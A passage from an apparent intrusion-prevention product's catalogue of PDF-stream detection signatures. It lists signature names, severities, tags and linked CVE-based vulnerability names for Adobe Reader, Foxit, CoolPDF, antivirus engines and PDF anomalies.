Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Vulnerability: Adobe-Reader-And-Acrobat-Sandbox-Policy-Bypass
Description:
Back to top

File-PDF_Adobe-Reader-BMP-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Adobe-Reader-BMP-Vulnerability-2011-2438a
Adobe-Reader-BMP-Vulnerability-2011-4372
Description:
Back to top

File-PDF_Adobe-Reader-BMP-Vulnerability-2011-2438c

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Adobe-Reader-BMP-Vulnerability-2011-2438c
Description:
Back to top

File-PDF_Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2012-2050

About this situation: Malicious PDF file detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2012-2049
Description:
Back to top

File-PDF_Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3353

About this situation: An attempt to exploit a vulnerability in Adobe Reader
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-551-5211
Last changed: sgpkg-ips-551-5211
Vulnerability: Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3353
Description:
Back to top

File-PDF_Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3354

About this situation: An attempt to exploit a vulnerability in Adobe Reader
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-551-5211
Last changed: sgpkg-ips-551-5211
Vulnerability: Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3354
Description:
Back to top

File-PDF_Adobe-Reader-Crash-CVE-2015-3056

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: Adobe-Reader-Crash-CVE-2015-3056
Description:
Back to top

File-PDF_Adobe-Reader-Heap-Overflow-CVE-2017-3055

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-880-5242
Vulnerability: Adobe-Reader-Heap-Overflow-CVE-2017-3055
Description:
Back to top

File-PDF_Adobe-Reader-Heap-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: Adobe-Reader-Heap-Overflow-Vulnerability
Description:
Back to top

File-PDF_Adobe-Reader-Heap-Overflow-Vulnerability-CVE-2013-0604

About this situation: Malicious PDF file detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-504-5211
Vulnerability: Adobe-Reader-Heap-Overflow-Vulnerability-CVE-2013-0604
Description:
Back to top

File-PDF_Adobe-Reader-Iff-Rgba-Chunk-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Adobe-Reader-Iff-Rgba-Chunk-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Reader-Information-Disclosure-CVE-2017-3031

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-877-5242
Vulnerability: Adobe-Reader-Information-Disclosure-CVE-2017-3031
Description:
Back to top

File-PDF_Adobe-Reader-Integer-Overflow-CVE-2010-2862

About this situation: A malicious PDF document targeting CVE-2010-2862 over HTTP detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Reader-Integer-Overflow-CVE-2010-2862
Description:
Back to top

File-PDF_Adobe-Reader-JavaScript-Heap-Corruption-CVE-2011-4371

About this situation: A malicious PDF file was detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-434-4219
Last changed: sgpkg-ips-434-4219
Vulnerability: Adobe-Reader-JavaScript-Heap-Corruption-CVE-2011-4371
Description:
Back to top

File-PDF_Adobe-Reader-JavaScript-Memory-Corruption-CVE-2011-4373

About this situation: A malicious PDF file was detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-434-4219
Last changed: sgpkg-ips-434-4219
Vulnerability: Adobe-Reader-JavaScript-Memory-Corruption-CVE-2011-4373
Description:
Back to top

File-PDF_Adobe-Reader-JavaScript-Vulnerability-2011-2442

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1617-5242
Vulnerability: Adobe-Reader-JavaScript-Vulnerability-2011-2442
Description:
Back to top

File-PDF_Adobe-Reader-JPEG-Multiple-App0-Markers

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2011, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-413-4219
Vulnerability: Adobe-Reader-JPEG-Multiple-App0-Markers
Description:
Back to top

File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3019

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-877-5242
Vulnerability: Adobe-Reader-Memory-Corruption-CVE-2017-3019
Description:
Back to top

File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3025

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-877-5242
Vulnerability: Adobe-Reader-Memory-Corruption-CVE-2017-3025
Description:
Back to top

File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3030

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-877-5242
Vulnerability: Adobe-Reader-Memory-Corruption-CVE-2017-3030
Description:
Back to top

File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3056

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-880-5242
Vulnerability: Adobe-Reader-Memory-Corruption-CVE-2017-3056
Description:
Back to top

File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4147

About this situation: Malicious PDF file detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4147
Description:
Back to top

File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4148

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4148
Description:
Back to top

File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4150

About this situation: Malicious PDF file detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4150
Description:
Back to top

File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4151

About this situation: Malicious PDF file detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4151
Description:
Back to top

File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4152

About this situation: Malicious PDF file detected
Context: PDF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2012, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4152
Description:
Back to top

File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4153

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4153
Description:
Back to top

File-PDF_Adobe-Reader-OpenTextFile-Buffer-Overflow

About this situation: An attempt to exploit an Adobe Reader OpenTextFile Buffer Overflow vulnerability detected
Context: PDF File Stream
Severity: 7
Tags: Windows XP SP3, Any Hardware, Adobe Reader, CVE2010, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-802-5242
Last changed: sgpkg-ips-802-5242
Vulnerability: Adobe-Reader-OpenTextFile-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Reader-Pcx-Height-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Adobe-Reader-Pcx-Height-Integer-Overflow
Description:
Back to top

File-PDF_Adobe-Reader-Pict-Header-Packet-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Adobe-Reader-Pict-Header-Packet-Overflow
Description:
Back to top

File-PDF_Adobe-Reader-Printseps-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Systems Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-867-5242
Vulnerability: Adobe-Reader-Printseps-Memory-Corruption
Description:
Back to top

File-PDF_Adobe-Reader-Security-Bypass-Vulnerability-CVE-2013-0622

About this situation: Malicious PDF file detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-504-5211
Vulnerability: Adobe-Reader-Security-Bypass-Vulnerability-CVE-2013-0622
Description:
Back to top

File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-2049

About this situation: Malicious PDF file detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-2049
Description:
Back to top

File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4149

About this situation: Malicious PDF file detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-476-5211
Last changed: sgpkg-ips-476-5211
Vulnerability: Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4149
Description:
Back to top

File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4155

About this situation: Malicious PDF file detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-476-5211
Last changed: sgpkg-ips-476-5211
Vulnerability: Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4155
Description:
Back to top

File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4157

About this situation: Malicious PDF file detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-476-5211
Last changed: sgpkg-ips-476-5211
Vulnerability: Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4157
Description:
Back to top

File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4159

About this situation: Malicious PDF file detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-476-5211
Last changed: sgpkg-ips-476-5211
Vulnerability: Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4159
Description:
Back to top

File-PDF_Adobe-Reader-U3D-CLODMeshDeclaration-Shading-Count-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-503-5211
Vulnerability: Adobe-Reader-U3D-CLODMeshDeclaration-Shading-Count-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Reader-Use-After-Free-CVE-2015-3057

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: Adobe-Reader-Use-After-Free-CVE-2015-3057
Description:
Back to top

File-PDF_Adobe-Reader-Use-After-Free-CVE-2015-3059

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: Adobe-Reader-Use-After-Free-CVE-2015-3059
Description:
Back to top

File-PDF_Adobe-Reader-Use-After-Free-CVE-2017-3014

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-877-5242
Vulnerability: Adobe-Reader-Use-After-Free-CVE-2017-3014
Description:
Back to top

File-PDF_Adobe-Reader-Use-After-Free-CVE-2017-3057

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-880-5242
Vulnerability: Adobe-Reader-Use-After-Free-CVE-2017-3057
Description:
Back to top

File-PDF_BitDefender-AntiVirus-PDF-Processing-Memory-Corruption

About this situation: Detected an attempt to exploit a vulnerability in BitDefender Antivirus
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, BitDefender, BitDefender Internet Security, BitDefender Total Security, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: BitDefender-AntiVirus-PDF-Processing-Memory-Corruption
Description:
Back to top

File-PDF_Clamav-Encrypted-PDF-File-Handling-Memory-Access-Error

About this situation: An attempt to exploit a vulnerability in ClamAV Project ClamAV detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-528-5211
Vulnerability: Clamav-Encrypted-PDF-File-Handling-Memory-Access-Error
Description:
Back to top

File-PDF_Conflicting-Content-Type-Text

About this situation: Detected conflicting Content-Type header
Context: PDF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-PDF_Conflicting-Content-Type-Text-HTML

About this situation: Detected conflicting Content-Type header
Context: PDF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-636-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-PDF_Conflicting-Content-Type-Text-Plain

About this situation: Detected conflicting Content-Type header
Context: PDF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-636-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-PDF_Cool-PDF-Image-Stream-Buffer-Overflow

About this situation: An attempt to exploit a Cool PDF Image Stream Buffer Overflow vulnerability detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, CoolPDF Reader, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Vulnerability: Cool-PDF-Image-Stream-Buffer-Overflow
Description:
Back to top

File-PDF_Coolpdf-Reader-CVE-2012-4914

About this situation: A suspicious PDF file detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-PDF_Coolpdf-Reader-Image-Stream-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in CoolPDF Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CoolPDF Reader, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-514-5211
Vulnerability: Coolpdf-Reader-Image-Stream-Processing-Buffer-Overflow
Description:
Back to top

File-PDF_Docm-File-And-JavaScript-In-PDF

About this situation: Docm file and Javascript In PDF
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-930-5242
Vulnerability: JavaScript-In-PDF
Description:
Back to top

File-PDF_EICAR-AntiVirus-Test

About this situation: Detected an EICAR antivirus test file
Context: PDF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-PDF_Embedded-Adobe-Flash

About this situation: Detected a download of Adobe Flash content embedded in PDF
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Adobe-Flash-Media-Content
Description:
Back to top

File-PDF_Embedded-Zip-Archive

About this situation: Embedded zip archive
Context: PDF File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-PDF_Encoded-JavaScript-Tag-In-PDF

About this situation: Encoded JavaScript tag in PDF detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-494-5211
Vulnerability: Encoded-JavaScript-Tag-In-PDF
Description:
Back to top

File-PDF_Encoded-Stream-Filter-Name-In-PDF

About this situation: Encoded stream filter name in PDF detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-494-5211
Vulnerability: Encoded-Stream-Filter-Name-In-PDF
Description:
Back to top

File-PDF_Foxit-PDF-JavaScript-Xfa-User-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Software PDF Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1518-5242
Last changed: sgpkg-ips-1518-5242
Vulnerability: Foxit-PDF-Reader-JavaScript-Xfa-User-After-Free
Description:
Back to top

File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-CVE-2021-34850-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Software PDF Editor detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1402-5242
Last changed: sgpkg-ips-1402-5242
Vulnerability: Foxit-PDF-Reader-And-Editor-Annotation-CVE-2021-34850-Use-After-Free
Description:
Back to top

File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-Rect-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Software PDF Editor detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1402-5242
Last changed: sgpkg-ips-1402-5242
Vulnerability: Foxit-PDF-Reader-And-Editor-Annotation-Rect-Use-After-Free
Description:
Back to top

File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-Richdefaults-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Software PDF Editor detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1397-5242
Last changed: sgpkg-ips-1397-5242
Vulnerability: Foxit-PDF-Reader-And-Editor-Annotation-Richdefaults-Use-After-Free
Description:
Back to top

File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-Rotate-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Software PDF Editor detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1402-5242
Vulnerability: Foxit-PDF-Reader-And-Editor-Annotation-Rotate-Use-After-Free
Description:
Back to top

File-PDF_Foxit-PDF-Reader-And-Editor-Exportxfadata-Handling-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Foxit Software PDF Reader and Editor detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1636-5242
Vulnerability: Foxit-PDF-Reader-And-Editor-Exportxfadata-Handling-Remote-Code-Execution
Description:
Back to top

File-PDF_Foxit-Phantompdf-Acroform-Addwatermarkfromtext-Object-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Software PhantomPDF detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, PhantomPDF, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: Foxit-Phantompdf-Acroform-Addwatermarkfromtext-Object-Use-After-Free
Description:
Back to top

File-PDF_Foxit-Phantompdf-Text-Field-Object-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Foxit Software PhantomPDF detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, PhantomPDF, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1252-5242
Vulnerability: Foxit-Phantompdf-Text-Field-Object-Use-After-Free
Description:
Back to top

File-PDF_Foxit-Quick-PDF-Library-CVE-2018-20247-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Foxit Software Quick PDF Library detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Software Quick PDF Library, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Foxit-Quick-PDF-Library-CVE-2018-20247-Denial-Of-Service
Description:
Back to top

File-PDF_Foxit-Reader-And-Editor-Annotation-CVE-2021-34833-Use-After-Free

